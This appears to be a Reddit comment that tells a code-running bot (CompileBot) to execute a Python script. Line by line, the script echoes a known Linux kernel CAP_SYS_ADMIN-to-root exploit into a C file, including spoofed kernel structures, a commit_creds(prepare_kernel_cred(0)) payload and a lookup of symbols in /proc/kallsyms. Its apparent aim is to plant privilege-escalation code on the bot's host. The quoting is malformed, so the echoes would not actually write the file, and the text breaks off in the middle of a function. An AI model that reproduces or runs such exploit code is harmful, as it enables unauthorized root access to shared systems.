+/u/CompileBot python

import os
os.system("rm -f x.c; touch x.c")    
os.system("echo '/* > x.c '")
os.system("echo '/* > x.c '")
os.system("echo ' * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) > x.c '")
os.system("echo ' * by Joe Sylve > x.c '")
os.system("echo ' * @jtsylve on twitter > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Released: Jan 7, 2011 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Based on the bug found by Dan Rosenberg (@djrbliss) > x.c '")
os.system("echo ' * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ > x.c '")
os.system("echo ' *  > x.c '")
os.system("echo ' * Usage: > x.c '")
os.system("echo ' * gcc -w caps-to-root2.c -o caps-to-root2 > x.c '")
os.system("echo ' * sudo setcap cap_sys_admin+ep caps-to-root2 > x.c '")
os.system("echo ' * ./caps-to-root2 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Kernel Version >= 2.6.34 (untested on earlier versions) > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * This exploit takes advantage of the same underflow as the original, > x.c '")
os.system("echo ' * but takes a different approach.  Instead of underflowing into userspace > x.c '")
os.system("echo ' * (which doesn\'t work on 64-bit systems and is a lot of work), I underflow  > x.c '")
os.system("echo ' * to some static values inside of the kernel which are referenced as pointers > x.c '")
os.system("echo ' * to userspace.  This method is pretty simple and seems to be reliable. > x.c '")
os.system("echo ' */ > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#include <stdio.h> > x.c '")
os.system("echo '#include <sys/socket.h> > x.c '")
os.system("echo '#include <errno.h> > x.c '")
os.system("echo '#include <string.h> > x.c '")
os.system("echo '#include <sys/mman.h> > x.c '")
os.system("echo '#include <unistd.h> > x.c '")
os.system("echo '  > x.c '")
os.system("echo '// Skeleton Structures of the Kernel Structures we\'re going to spoof > x.c '")
os.system("echo 'struct proto_ops_skel { > x.c '")
os.system("echo '    int family; > x.c '")
os.system("echo '    void  *buffer1[8]; > x.c '")
os.system("echo '    int (*ioctl)(void *, int, long); > x.c '")
os.system("echo '    void  *buffer2[12]; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'struct phonet_protocol_skel { > x.c '")
os.system("echo '    void    *ops; > x.c '")
os.system("echo '    void    *prot; > x.c '")
os.system("echo '    int sock_type;   > x.c '")
os.system("echo '}; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#ifdef __x86_64__  > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#define SYM_NAME \"local_port_range\" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x0000007f00000040 > x.c '")
os.system("echo '#define SYM_OFFSET 0x0 > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'typedef int (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#else //32-bit > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#define SYM_NAME \"pn_proto\" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x4e4f4850 > x.c '")
os.system("echo '#define SYM_OFFSET 0x90 > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '#endif > x.c '")
os.system("echo '  > x.c '")
os.system("echo '  > x.c '")
os.system("echo '_commit_creds commit_creds; > x.c '")
os.system("echo '_prepare_kernel_cred prepare_kernel_cred; > x.c '")
os.system("echo '  > x.c '")
os.system("echo 'int getroot(void * v, int i, long l) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo '    commit_creds(prepare_kernel_cred(0)); > x.c '")
os.system("echo '    return 0;       > x.c '")
os.system("echo '} > x.c '")
os.system("echo '  > x.c '")
os.system("echo '/* thanks spender... */ > x.c '")
os.system("echo 'unsigned long get_kernel_sym(char *name) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo '    FILE *f; > x.c '")
os.system("echo '    unsigned long addr; > x.c '")
os.system("echo '    char dummy; > x.c '")
os.system("echo '    char sname[512]; > x.c '")
os.system("echo '    int ret; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    char command[512]; > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    sprintf(command, \"grep \\"%s\\" /proc/kallsyms\", name); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    f = popen(command, \"r\"); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '    while(ret != EOF) { > x.c '")
os.system("echo '        ret = fscanf(f, \"%p %c %s\n\", (void **) &addr, &dummy, sname); > x.c '")
os.system("echo '  > x.c '")
os.system("echo '        if (ret == 0) { > x.c '")
os.system("echo '            fscanf(f, \"%s\n\", sname); > x.c '")
os.system("echo '            continue; > x.c '")
os.system("echo '        } > x.c '")
os.system("echo '  > x.c '")
os.system("echo '        if (!strcmp(name, sname)) { > x.c '")
os.system("echo '  > x.c '")